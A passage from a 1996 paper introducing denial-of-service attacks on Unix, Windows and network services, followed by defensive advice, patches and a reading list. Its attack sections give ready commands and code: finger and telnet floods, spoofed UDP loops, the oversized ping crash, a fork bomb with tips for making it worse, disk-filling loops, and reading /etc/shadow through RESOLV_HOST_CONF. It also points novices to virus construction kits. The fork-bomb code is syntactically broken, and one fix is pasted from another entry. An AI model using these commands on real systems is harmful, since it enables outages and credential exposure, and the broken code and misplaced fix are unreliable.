packets to it and almost totally control the boot.
.A.2.4. REVENGE
A denial of service attack could be a part of a revenge against a user
or an administrator.
.A.2.5. POLITICAL REASONS
Sooner or later will new or old organizations understand the potential
of destroying computer systems and find tools to do it.
For example imagination the Bank A loaning company B money to build a
factory treating the environment. The organization C therefor crash A:s
computer system, maybe with help from an employee. The attack could cost
A a great deal of money if the timing is right.
.A.2.6. ECONOMICAL REASONS
Imaginative the small company A moving into a business totally dominated by
company B. A and B customers make the orders by computers and depends
heavily on that the order is done in a specific time (A and B could be
stock trading companies). If A and B can't perform the order the customers
lose money and change company.
As a part of a business strategy A pays a computer expert a sum of money to
get him to crash B:s computer systems a number of times. A year later A
is the dominating company.
.A.2.7. NASTINESS
I know a person that found a workstation where the user had forgotten to
log out. He sat down and wrote a program that made a kill -9 -1 at a
random time at least 30 minutes after the log in time and placed a call to
the program from the profile file. That is nastiness.
.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE ?
This is a hard question to answer and I don't think that it will
give anything to compare different Unix platforms. You can't say that
one Unix is more secure against denial of service, it is all up to the
administrator.
A comparison between Windows 95 and NT on one side and Unix on the
other could however be interesting.
Unix systems are much more complex and have hundreds of built in programs,
services... This always open up many ways to crash the system from
the inside.
In the normal Windows NT and 95 network were is few ways to crash
the system. Although were is methods that always will work.
That gives us that no big different between Microsoft and Unix can
be seen regardning the inside attacks. But there is a couple of
points left:
- Unix have much more tools and programs to discover an
attack and monitoring the users. To watch what another user
is up to under windows is very hard.
- The average Unix administrator probably also have much more
experience than the average Microsoft administrator.
The two last points gives that Unix is more secure against inside
denial of service attacks.
A comparison between Microsoft and Unix regarding outside attacks
are much more difficult. However I would like to say that the average
Microsoft system on the Internet are more secure against outside
attacks, because they normally have much less services.
.B. SOME BASIC TARGETS FOR AN ATTACK
.B.1. SWAP SPACE
Most systems have several hundred Mb of swap space to
service client requests. The swap space is typical used
for forked child processes which have a short life time.
The swap space will therefore almost never in a normal
cause be used heavily. A denial of service could be based
on a method that tries to fill up the swap space.
.B.2. BANDWIDTH
If the bandwidth is to high the network will be useless. Most
denial of service attack influence the bandwidth in some way.
.B.3. KERNEL TABLES
It is trivial to overflow the kernel tables which will cause
serious problems on the system. Systems with write through
caches and small write buffers is especially sensitive.
Kernel memory allocation is also a target that is sensitive.
The kernel have a kernel-map limit, if the system reach this
limit it can not allocate more kernel memory and must be rebooted.
The kernel memory is not only used for RAM, CPU:s, screens and so
on, it it also used for ordinaries processes. Meaning that any system
can be crashed and with a mean (or in some sense good) algorithm pretty
fast.
For Solaris 2.X it is measured and reported with the start command
how much kernel memory the system is using, but for Sun-OS 4.X there
is no such command. Meaning that under Sun-OS 4.X you don't even can
get a warning. If you do use Solaris you should write sar -k 1 to
get the information. net stat -k can also be used and shows how much
memory the kernel have allocated in the sub-paging.
.B.4. RAM
A denial of service attack that allocates a large amount of RAM
can make a great deal of problems. NFS and mail servers are
actually extremely sensitive because they do not need much
RAM and therefore often don't have much RAM. An attack at
a NFS server is trivial. The normal NFS client will do a
great deal of caching, but a NFS client can be anything
including the program you wrote yourself...
.B.5. DISKS
A classic attack is to fill up the hard disk, but an attack at
the disks can be so much more. For example can an overloaded disk
be misused in many ways.
.B.6. CACHES
A denial of service attack involving caches can be based on a method
to block the cache or to avoid the cache.
These caches are found on Solaris 2.X:
Directory name look-up cache: Associates the name of a file with a v code.
I node cache: Cache information read from disk in case it is needed
again.
R code cache: Holds information about the IFS file system.
Buffer cache: Cache in code indirect blocks and cylinders to disk
I/O.
.B.7. INETD
Well once inetd crashed all other services running through inetd no
longer will work.
.C. ATTACKING FROM THE OUTSIDE
.C.1. TAKING ADVANTAGE OF FINGER
Most fingered installations support re-directions to an other host.
Ex:
$finger @system.two.com
@system.one.com
finger will in the example go through system.one.com and on to
system.two.com. As far as system.two.com knows it is system.one.com
who is fingering. So this method can be used for hiding, but also
for a very dirty denial of service attack. Lock at this:
$ finger @host.we.attack
All those @ signs will get finger to finger host.we.attack again and
again and again... The effect on host.we.attack is powerful and
the result is high bandwidth, short free memory and a hard disk with
less free space, due to all child processes (compare with .D.5.).
The solution is to install a fingerd which don't support redirections,
for example GNU finger. You could also turn the finger service off,
but I think that is just a bit to much.
.C.2. UDP AND SUN-OS 4.1.3.
Sun-OS 4.1.3. is known to boot if a packet with incorrect information
in the header is sent to it. This is the cause if the ip_options
indicate a wrong size of the packet.
The solution is to install the proper patch.
.C.3. FREEZING UP X-WINDOWS
If a host accepts a telnet session to the X-Windows port (generally
somewhere between 6000 and 6025. In most cases 6000) could that
be used to freeze up the X-Windows system. This can be made with
multiple telnet connections to the port or with a program which
sends multiple X Open Display () to the port.
The same thing can happen to Motif or Open Windows.
The solution is to deny connections to the X-Windows port.
.C.4. MALICIOUS USE OF UDP SERVICES
It is simple to get UDP services (echo, time, daytime, charged) to
loop, due to trivial IP spoofing. The effect can be high bandwidth
that causes the network to become useless. In the example the header
claim that the packet came from 127.0.0.1 (loop-back) and the target
is the echo port at system.we.attack. As far as system.we.attack knows
is 127.0.0.1 system.we.attack and the loop has been establish.
Ex:
from-IP=127.0.0.1
to-IP=system.we.attack
Packet type:UDP
from UDP port 7
to UDP port 7
Note that the name system.we.attack looks like a DNS name, but the
target should always be represented by the IP-number.
Quoted from proberts@clark.net (Paul D. Robertson) comment on
comp.security.firewalls on matter of "Introduction to denial of service"
" A great deal of systems don't put loop-back on the wire, and simply
emulate it. Therefore, this attack will only effect that machine
in some cases. It's much better to use the address of a different
machine on the same network. Again, the default services should
be disabled in inetd.conf. Other than some hacks for mainframe IP
stacks that don't support ICMP, the echo service isn't used by many
legitimate programs, and TCP echo should be used instead of UDP
where it is necessary. "
.C.5. ATTACKING WITH LYNX CLIENTS
A World Wide Web server will fork an http process as a respond
to a request from a client, typical Netscape or Mosaic. The process
lasts for less than one second and the load will therefore never
show up if someone uses pc. In most causes it is therefore very
safe to launch a denial of service attack that makes use of
multiple W3 clients, typical lynx clients. But note that the net-stat
command could be used to detect the attack (thanks to Paul D. Robertson).
Some http:s (for example HTTP-gw) will have problems besides the normal
high bandwidth, low memory... And the attack can in those causes get
the server to loop (compare with .C.6.)
.C.6. MALICIOUS USE OF telnet
Study this little script:
Ex:
while : ; do
telnet system.we.attack &
done
An attack using this script might eat some bandwidth, but it is
nothing compared to the finger method or most other methods. Well
the point is that some pretty common firewalls and http:s thinks
that the attack is a loop and turn them self down, until the
administrator sends kill -HUP.
This is a simple high risk vulnerability that should be checked
and if present fixed.
.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
If the attacker makes a telnet connections to the Solaris 2.4 host and
quits using:
Ex:
Control-}
quit
then will inetd keep going "forever". Well a couple of hundred...
The solution is to install the proper patch.
.C.8. HOW TO DISABLE ACCOUNTS
Some systems disable an account after N number of bad log in , or waits
N seconds. You can use this feature to lock out specific users from
the system.
.C.9. LINUX AND TCP TIME, DAYTIME
Inetd under Linux is known to crash if to many SYN packets sends to
daytime (port 13) and/or time (port 37).
The solution is to install the proper patch.
.C.10. HOW TO DISABLE SERVICES
Most Unix systems disable a service after N sessions have been
open in a given time. Well most systems have a reasonable default
(lets say 800 - 1000), but not some Sun-OS systems that have the
default set to 48...
The solutions is to set the number to something reasonable.
.C.11. PARAGON OS BETA R1.4
If someone redirects an ICMP (Internet Control Message Protocol) packet
to a paragon OS beta R1.4 will the machine freeze up and must be
rebooted. An ICMP redirect tells the system to override routing
tables. Routers use this to tell the host that it is sending
to the wrong router.
The solution is to install the proper patch.
.C.12. NOVELLS NET-WARE FTP
Novells Net-ware FTP server is known to get short of memory if multiple
ftp sessions connects to it.
.C.13. ICMP REDIRECT ATTACKS
Gateways uses ICMP redirect to tell the system to override routing
tables, that is telling the system to take a better way. To be able
to misuse ICMP redirection we must know an existing connection
(well we could make one for our-self, but there is not much use for that).
If we have found a connection we can send a route that
loses it connectivity or we could send false messages to the host
if the connection we have found don't use cryptation.
Ex: (false messages to send)
DESTINATION UNREACHABLE
TIME TO LIVE EXCEEDED
PARAMETER PROBLEM
PACKET TOO BIG
The effect of such messages is a reset of the connection.
The solution could be to turn ICMP redirects off, not much proper use
of the service.
.C.14. BROADCAST STORMS
This is a very popular method in networks there all of the hosts are
acting as gateways.
There are many versions of the attack, but the basic method is to
send a lot of packets to all hosts in the network with a destination
that don't exist. Each host will try to forward each packet so
the packets will bounce around for a long time. And if new packets
keep coming the network will soon be in trouble.
Services that can be misused as tools in this kind of attack is for
example ping, finger and sendmail. But most services can be misused
in some way or another.
.C.15. EMAIL BOMBING AND SPAMMING
In a email bombing attack the attacker will repeatedly send identical
email messages to an address. The effect on the target is high bandwidth,
a hard disk with less space and so on... Email spamming is about sending
mail to all (or rather many) of the users of a system. The point of
using spamming instead of bombing is that some users will try to
send a replay and if the address is false will the mail bounce back. In
that cause have one mail transformed to three mails. The effect on the
bandwidth is obvious.
There is no way to prevent email bombing or spamming. However have
a look at CERT:s paper "Email bombing and spamming".
.C.16. TIME AND KERBEROS
If not the the source and target machine is closely aligned will the
ticket be rejected, that means that if not the protocol that set the
time is protected it will be possible to set a kerberos server of
function.
.C.17. THE DOT DOT BUG
Windows NT file sharing system is vulnerable to the under Windows 95
famous dot dot bug (dot dot like ..). Meaning that anyone can crash
the system. If someone sends a "DIR ..\" to the workstation will a
STOP messages appear on the screen on the Windows NT computer. Note that
it applies to version 3.50 and 3.51 for both workstation and server
version.
The solution is to install the proper patch.
.C.18. SUN-OS KERNEL PANIC
Some Sun-OS systems (running ITS ?) will get a kernel panic if a
getsockopt() is done after that a connection has been reset.
The solution could be to install Sun patch 100804.
.C.19. HOSTILE APPLETS
A hostile applet is any applet that attempts to use your system
in an inappropriate manner. The problems in the java language
could be sorted in two main groups:
1) Problems due to bugs.
2) Problems due to features in the language.
In group one we have for example the java byte code verifier bug, which
makes is possible for an applet to execute any command that the user
can execute. Meaning that all the attack methods described in .D.X.
could be executed through an applet. The java byte code verifier bug
was discovered in late March 1996 and no patch have yet been available
(correct me if I am wrong!!!).
Note that two other bugs could be found in group one, but they
are both fixed in Netscape 2.01 and JD 1.0.1.
Group two are more interesting and one large problem found is the
fact that java can connect to the ports. Meaning that all the methods
described in .C.X. can be performed by an applet. More information
and examples could be found at address:
http://www.math.gatech.edu/~mladue/HostileArticle.html
If you need a high level of security you should use some sort of
firewall for protection against java. As a user you could have
java disable.
.C.20. VIRUS
Computer virus is written for the purpose of spreading and
destroying systems. Virus is still the most common and famous
denial of service attack method.
It is a misunderstanding that virus writing is hard. If you know
assembly language and have source code for a couple of virus it
is easy. Several automatic toolkits for virus construction could
also be found, for example:
* Genvir.
* VCS (Virus Construction Set).
* VCL (Virus Construction Laboratory).
* PS-MPC (Phalcon/Skism - Mass Produced Code Generator).
* IVP (Instant Virus Production Kit).
* G2 (G Squared).
PS-MPC and VCL is known to be the best and can help the novice programmer
to learn how to write virus.
An automatic tool called MtE could also be found. MtE will transform
virus to a polymorphic virus. The polymorphic engine of MtE is well
known and should easily be catch by any scanner.
.C.21. ANONYMOUS FTP ABUSE
If an anonymous FTP archive have a writable area it could be misused
for a denial of service attack similar with with .D.3. That is we can
fill up the hard disk.
Also can a host get temporarily unusable by massive numbers of
FTP requests.
For more information on how to protect an anonymous FTP site could
CERT:s "Anonymous FTP Abuses" be a good start.
.C.22. SYN FLOODING
Both 2600 and Phrack have posted information about the syn flooding attack.
2600 have also posted exploit code for the attack.
As we know the syn packet is used in the 3-way handshake. The syn flooding
attack is based on an incomplete handshake. That is the attacker host
will send a flood of syn packet but will not respond with an ACK packet.
The TCP/IP stack will wait a certain amount of time before dropping
the connection, a syn flooding attack will therefore keep the syn_received
connection queue of the target machine filled.
The syn flooding attack is very hot and it is easy to find more information
about it, for example:
[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html
Article by Christopher Klaus, including a "solution".
[.2.] http://jya.com/floodd.txt
2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane
[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
IP-spoofing Demystified by daemon9 / route / infinity
for Phrack Magazine
.C.23. PING FLOODING
I haven't tested how big the impact of a ping flooding attack is, but
it might be quite big.
Under Unix we could try something like: ping -s host
to send 64 bytes packets.
If you have Windows 95, click the start button, select RUN, then type
in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.
.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
If someone can ping your machine from a Windows 95 machine he or she might
reboot or freeze your machine. The attacker simply writes:
ping -l 65510 address.to.the.machine
And the machine will freeze or reboot.
Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash).
AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash).
OSF/1, 3.2C, Solaris 2.4 x86 (reboot).
.C.25. MALICIOUS USE OF SUB-NET MASK REPLY MESSAGE
The subnet mask reply message is used under the reboot, but some
hosts are known to accept the message any time without any check.
If so all communication to or from the host us turned off, it's dead.
The host should not accept the message any time but under the reboot.
.C.26. FLEXlm
Any host running FLEXlm can get the FLEXlm license manager daemon
on any network to shutdown using the FLEXlm down command.
# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.
Shutting down FLEXlm on nodes: xxx
Are you sure? [y/n]: y
Shut down node xxx
#
.C.27. BOOTING WITH TRIVIAL FTP
To boot diskless workstations one often use trivial ftp with rarp or
bootp. If not protected an attacker can use tftp to boot the host.
.D. ATTACKING FROM THE INSIDE
.D.1. KERNEL PANIC UNDER SOLARIS 2.3
Solaris 2.3 will get a kernel panic if this
is executed:
EX:
$ndd /dev/udp udp_status
The solution is to install the proper patch.
.D.2. CRASHING THE X-SERVER
If sticky bit is not set in /tmp then can the file /tmp/.x11-unix/x0
be removed and the x-server will crash.
Ex:
$ rm /tmp/.x11-unix/x0
.D.3. FILLING UP THE HARD DISK
If your hard disk space is not limited by a quota or if you can use
/tmp then it`s possible for you to fill up the file system.
Ex:
while : ;
mkdir .xxx
cd .xxx
done
.D.4. MALICIOUS USE OF eval
Some older systems will crash if eval '\!\!' is executed in the
C-shell.
Ex:
% eval '\!\!'
.D.5. MALICIOUS USE OF fork()
If someone executes this C++ program the result will result in a crash
on most systems.
Ex:
#include <sys/types.h>
#include <unistd.h>
#include <iostream.h>
main()
{
int x;
while(x=0;x<1000000;x++)
{
system("uptime");
fork();
}
}
You can use any command you want, but uptime is nice
because it shows the workload.
To get a bigger and very ugly attack you should however replace uptime
(or fork them both) with sync. This is very bad.
If you are real mean you could also fork a child process for
every child process and we will get an exponential increase of
workload.
There is no good way to stop this attack and
similar attacks. A solution could be to place a limit
on time of execution and size of processes.
.D.6. CREATING FILES THAT IS HARD TO REMOVE
Well all files can be removed, but here is some ideas:
Ex.I.
$ cat > -xxx
^C
$ ls
-xxx
$ rm -xxx
rm: illegal option -- x
rm: illegal option -- x
rm: illegal option -- x
usage: rm [-fiRr] file ...
$
Ex.II.
$ touch xxx!
$ rm xxx!
rm: remove xxx! (yes/no)? y
$ touch xxxxxxxxx!
$ rm xxxxxxxxx!
bash: !": event not found
$
(You see the size do count!)
Other well know methods is files with odd characters or spaces
in the name.
These methods could be used in combination with ".D.3 FILLING UP THE
HARDDISK". If you do want to remove these files you must use some sort
of script or a graphical interface like OpenWindow:s File
Manager. You can also try to use: rm ./<filename>. It should work for
the first example if you have a shell.
.D.7. DIRECTORY NAME LOOK UP CACHE
Directory name look up cache (DNLC) is used whenever a file is opened.
DNLC associates the name of the file to a vnode. But DNLC can only
operate on files with names that has less than N characters (for SunOS 4.x
up to 14 character, for Solaris 2.x up 30 characters). This means
that it's dead easy to launch a pretty discreet denial of service attack.
Create lets say 20 directories (for a start) and put 10 empty files in
every directory. Let every name have over 30 characters and execute a
script that makes a lot of ls -al on the directories.
If the impact is not big enough you should create more files or launch
more processes.
.D.8. CSH ATTACK
Just start this under /bin/csh (after proper modification)
and the load level will get very high (that is 100% of the cpu time)
in a very short time.
Ex:
|I /bin/csh
nodename : **************b
.D.9. CREATING FILES IN /tmp
Many programs creates files in /tmp, but are unable to deal with the problem
if the file already exist. In some cases this could be used for a
denial of service attack.
.D.10. USING RESOLV_HOST_CONF
Some systems have a little security hole in the way they use the
RESOLV_HOST_CONF variable. That is we can put things in it and
through ping access confidential data like /etc/shadow or
crash the system. Most systems will crash if /proc/kcore is
read in the variable and access through ping.
Ex:
$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf
.D.11. SUN 4.X AND BACKGROUND JOBS
Thanks to Mr David Honig <honig@amada.net> for the following:
" Put the string "a&" in a file called "a" and perform "chmod +x a".
Running "a" will quickly disable a Sun 4.x machine, even disallowing
(counter to specs) root log in as the kernel process table fills."
" The cute thing is the size of the
script, and how few keystrokes it takes to bring down a Sun
as a regular user."
.D.12. CRASHING DG/UX WITH ULIMIT
ulimit is used to set a limit on the system resources available to the
shell. If ulimit 0 is called before /etc/passwd, under DG/UX, will the
passwd file be set to zero.
.D.13. NET-TUNE AND HP-UX
/usr/contrib/bin/nettune is SETUID root on HP-UX meaning
that any user can reset all ICMP, IP and TCP kernel
parameters, for example the following parameters:
- arp_killcomplete
- arp_killincomplete
- arp_unicast
- arp_rebroadcast
- icmp_mask_agent
- ip_defaultttl
- ip_forwarding
- ip_intrqmax
- pmtu_defaulttime
- tcp_localsubnets
- tcp_receive
- tcp_send
- tcp_defaultttl
- tcp_keepstart
- tcp_keepfreq
- tcp_keepstop
- tcp_maxretrans
- tcp_urgent_data_ptr
- udp_cksum
- udp_defaultttl
- udp_newbcastenable
- udp_pmtu
- tcp_pmtu
- tcp_random_seq
The solution could be to set the proper permission on
/sbin/mount_union:
#chmod u-s /sbin/mount_union
.D.14. SOLARIS 2.X AND NFS
If a process is writing over NFS and the user goes over the disk
quota will the process go into an infinite loop.
.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
By executing a sequence of mount_union commands any user
can cause a system reload on all FreeBSD version 2.X before
1996-05-18.
$ mkdir a
$ mkdir b
$ mount_union ~/a ~/b
$ mount_union -b ~/a ~/b
The solution could be to set the proper permission on
/sbin/mount_union:
#chmod u-s /sbin/mount_union
.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUN-OS 4.1.X
Executing the trap_mon instruction from user mode can cause
a kernel panic or a window underflow watchdog reset under
SunOS 4.1.x, sun4c architecture.
.E. DUMPING CORE
.E.1. SHORT COMMENT
The core dumps things don't really belongs in this paper but I have
put them here anyway.
.E.2. MALICIOUS USE OF NETSCAPE
Under Netscape 1.1N this link will result in a segmentation fault and a
core dump.
Ex:
<a name="http://xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx...>
.E.3. CORE DUMPED UNDER WUFTPD
A core dumped could be created under wuftp with two different
methods:
(1) Then pasv is given (user not logged in (ftp -n)). Almost all
versions of BSD:s ftpd.
(2) More than 100 arguments is given with any executable
command. Presents in all versions of BSD:sd ftpd.
.E.4. ld UNDER SOLARIS/X86
Under Solaris 2.4/X86 ld dumps core if given with the -s option.
.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?
.F.1. BASIC SECURITY PROTECTION
.F.1.1. INTRODUCTION
You can not make your system totally secured against denial of service
attacks but for attacks from the outside you can do a lot. I put this
work list together and hope that it can be of some use.
.F.1.2. SECURITY PATCHES
Always install the proper security patches. As for patch numbers
I don't want to put them out, but that doesn't matter because you
anyway want to check that you have all security patches installed,
so get a list and check! Also note that patches change over time and
that a solution suggested in security bulletins (i.e. CERT) often
is somewhat temporary.
.F.1.3. PORT SCANNING
Check which services you have. Don't check with the manual
or some configuration file, instead scan the ports with strobe
or some other port scanner. Actual you should do this regularly to see
that anyone don't have installed a service that you don't want on
the system (could for example be service used for a pirate site).
Disable every service that you don't need, could for example be rexd,
fingerd, systat, netstat, rusersd, sprayd, pop3, uucpd, echo, chargen,
tftp, exec, ufs, daytime, time... Any combination of echo, time, daytime
and charged is possible to get to loop. There is however no need
to turn discard off. The discard service will just read a packet
and discard it, so if you turn off it you will get more sensitive to
denial of service and not the opposite.
Actual can services be found on many systems that can be used for
denial of service and brute force hacking without any logging. For
example Stock rexec never logs anything. Most popd:s also don't log
anything
.F.1.4. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER
Check that attacks described in this paper and look at the
solution. Some attacks you should perform yourself to see if they
apply to your system, for example:
- Freezing up X-Windows.
- Malicious use of telnet.
- How to disable services.
- Sun-OS kernel panic.
- Attacking with lynx clients.
- Crashing systems with ping from Windows 95 machines.
That is stress test your system with several services and look at
the effect.
Note that Solaris 2.4 and later have a limit on the number of ICMP
error messages (1 per 500 ms I think) that can cause problems then
you test your system for some of the holes described in this paper.
But you can easy solve this problem by executing this line:
$ /usr/sbin/ndd -set /dev/ip ip_icmp_err_interval 0
.F.1.5. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER
Check the inside attacks, although it is always possibly to crash
the system from the inside you don't want it to be to easy. Also
have several of the attacks applications besides denial of service,
for example:
- Crashing the X-Server: If stickybit is not set in /tmp
a number of attacks to gain
access can be performed.
- Using resolv_host_conf: Could be used to expose
confidential data like
/etc/shadow.
- Core dumped under wuftpd: Could be used to extract
password-strings.
If I don't have put out a solution I might have recommended son other paper.
If not I don't know of a paper with a solution I feel that I can recommend.
You should in these causes check with your company.
.F.1.6. EXTRA SECURITY SYSTEMS
Also think about if you should install some extra security systems.
The basic that you always should install is a log daemon and a wrapper.
A firewall could also be very good, but expensive. Free tools that can
be found on the Internet is for example:
TYPE:
NAME:
URL:
LOG DAEMON NET LOG ftp://net.tamu.edu/pub/security/TAMU
WRAPPER TCP WRAPPERS ftp://cert.org/pub/tools/tcp_wrappers
FIREWALL TIS ftp://ftp.tis.com/pub/firewalls/toolkit
Note that you should be very careful if building your own firewall with
TIS or you might open up new and very bad security holes, but it is a very
good security packer if you have some basic knowledge.
It is also very good to replace services that you need, for example telnet,
rlogin, rsh or whatever, with a tool like ssh. Ssh is free and can be
found at URL:
ftp://ftp.cs.hut.fi/pub/ssh
The addresses I have put out are the central sites for distributing
and I don't think that you should use any other except for CERT.
For a long list on free general security tools I recommend:
"FAQ: Computer Security Frequently Asked Questions".
.F.1.7. MONITORING SECURITY
Also monitor security regular, for example through examining system log
files, history files... Even in a system without any extra security systems
could several tools be found for monitoring, for example:
- up time
- show mount
- ps
- net stat
- finger
(see the man text for more information).
.F.1.8. KEEPING UP TO DATE
It is very important to keep up to date with security problems. Also
understand that then, for example CERT, warns for something it has often
been dark-side public for sometime, so don't wait. The following resources
that helps you keeping up to date can for example be found on the Internet:
- CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.
- Bugtraq mailing list. Send an e-mail to bugtraq-request@fc.net.
- WWW-security mailing list. Send an e-mail to
www-security@ns2.rutgers.edu.
.F.1.9. READ SOMETHING BIGGER AND BETTER
Let's start with papers on the Internet. I am sorry to say that it is not
very many good free papers that can be found, but here is a small collection
and I am sorry if have have over looked a paper.
(1) The Rainbow books is a long series of free books on computer security.
US citizens can get the books from:
INFOSEC AWARENESS OFFICE
National Computer Security Center
9800 Savage Road
Fort George G. Meader, MD 20755-600
We other just have to read the papers on the World Wide Web. Every
paper can not however be found on the Internet.
(2) "Improving the security of your Unix system" by Curry is also very
nice if you need the very basic things. If you don't now anything about
computer security you can't find a better start.
(3) "The WWW security FAQ" by Stein is although it deal with W3-security
the very best better on the Internet about computer security.
(4) CERT have aklso published several good papers, for example:
- Anonymous FTP Abuses.
- Email Bombing and Spamming.
- Spoofed/Forged Email.
- Protecting yourself from password file attacks.
I think however that the last paper have overlooked several things.
(5) For a long list on papers I can recommend:
"FAQ: Computer Security Frequently Asked Questions".
(6) Also see section ".G. SUGGESTED READING"
You should also get some big good commercial book, but I don't want
to recommend any.
.F.2. MONITORING PERFORMANCE
.F.2.1. INTRODUCTION
There is several commands and services that can be used for
monitoring performance. And at least two good free programs can
be found on Internet.
.F.2.2. COMMANDS AND SERVICES
For more information read the man text.
netstat Show network status.
nfsstat Show NFS statistics.
sar System activity reporter.
vmstat Report virtual memory statistics.
timex Time a command, report process data and system
activity.
time Time a simple command.
truss Trace system calls and signals.
uptime Show how long the system has been up.
Note that if a public netstat server can be found you might be able
to use netstat from the outside. netstat can also give information
like tcp sequence numbers and much more.
.F.2.3. PROGRAMS
Proctool: Proctool is a freely available tool for Solaris that monitors
and controls processes.
ftp://opcom.sun.ca/pub/binaries/
Top: Top might be a more simple program than Proctool, but is
good enough.
.F.2.4. ACCOUNTING
To monitor performance you have to collect information over a long
period of time. All Unix systems have some sort of accounting logs
to identify how much CPU time, memory each program uses. You should
check your manual to see how to set this up.
You could also invent your own account system by using crontab and
a script with the commands you want to run. Let crontab run the script
every day and compare the information once a week. You could for
example let the script run the following commands:
- netstat
- iostat -D
- vmstat
.G. SUGGESTED READING
.F.1. INFORMATION FOR DEEPER KNOWLEDGE
(1) Hedrick, C. Routing Information Protocol. RFC 1058, 1988.
(2) Mills, D.L. Exterior Gateway Protocol Formal Specification. RFC 904, 1984.
(3) Postel, J. Internet Control Message Protocol. RFC 792, 1981.
(4) Harrenstien, K. NAME/FINGER Protocol, RFC 742, 1977.
(5) Sollins, K.R. The TFTP Protocol, RFC 783, 1981.
(6) Croft, W.J. Bootstrap Protocol, RFC 951, 1985.
Many of the papers in this category was RFC-papers. A RFC-paper
is a paper that describes a protocol. The letters RCS stands for
Request For Comment. Hosts on the Internet are expected to understand
at least the common ones. If you want to learn more about a protocol
it is always good to read the proper RFC. You can find a nice sRFC
index search form at URL:
http://pubweb.nexor.co.uk/public/rfc/index/rfc.html
.F.2. KEEPING UP TO DATE INFORMATION
(1) CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.
(2) Bugtraq mailinglist. Send an e-mail to bugtraq-request@fc.net.
(3) WWW-security mailinglist. Send an e-mail to www-security@ns2.rutgers.edu.
(4) Sun Microsystems Security Bulletins.
(5) Various articles from: - comp.security.announce
- comp.security.unix
- comp.security.firewalls
(6) Varius 40Hex Issues.
.F.3. BASIC INFORMATION
(1) Husman, H. INTRODUCTION TILL DATA SKETCHER UNDER X-WINDOWS, 1995.
(2) Husman, H. INTRODUCTION TILL IP-SPOOFING, 1995.
(3) The following rainbow books: - Teal Green Book (Glossary of
Computer Security Terms).
- Bright Orange Book( A Guide
to Understanding Security Testing
and Test Documentation in Trusted
Systems).
- C1 Technical Report-001
(Computer Viruses: Prevention,
Detection, and Treatment).
(4) Ranum, Marcus. Firewalls, 1993.
(5) Sun Microsystems, OpenWindows V3.0.1. User Commands, 1992.
(6) Husman, H. ATT SPÅRA ODOKUMENTERADE SÄKERHETSLUCKOR, 1996.
(7) Dark OverLord, Unix Cracking Tips, 1989.
(8) Shooting Shark, Unix Nasties, 1988.
(9) LaDue, Mark.D. Hostile Applets on the Horizone, 1996.
(10) Curry, D.A. Improving the security of your unix system, 1990.
(11) Stein, L.D. The World Wide Web security FAQ, 1995.
(12) Bellovin, S.M. Security Problems in the TCP/IP Protocol, 1989.
.H. COPYRIGHT
This paper is Copyright (c) 1996 by Hans Husman.
Permission is hereby granted to give away free copies electronically. You
may distribute, transfer, or spread this paper electronically. You may not
pretend that you wrote it. This copyright notice must be maintained in any
copy made. If you wish to reprint the whole or any part of this paper in any
other medium excluding electronic medium, please ask the author for
permission.
.I. DISCLAIMER
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
Subscribe to:
Posts (Atom)





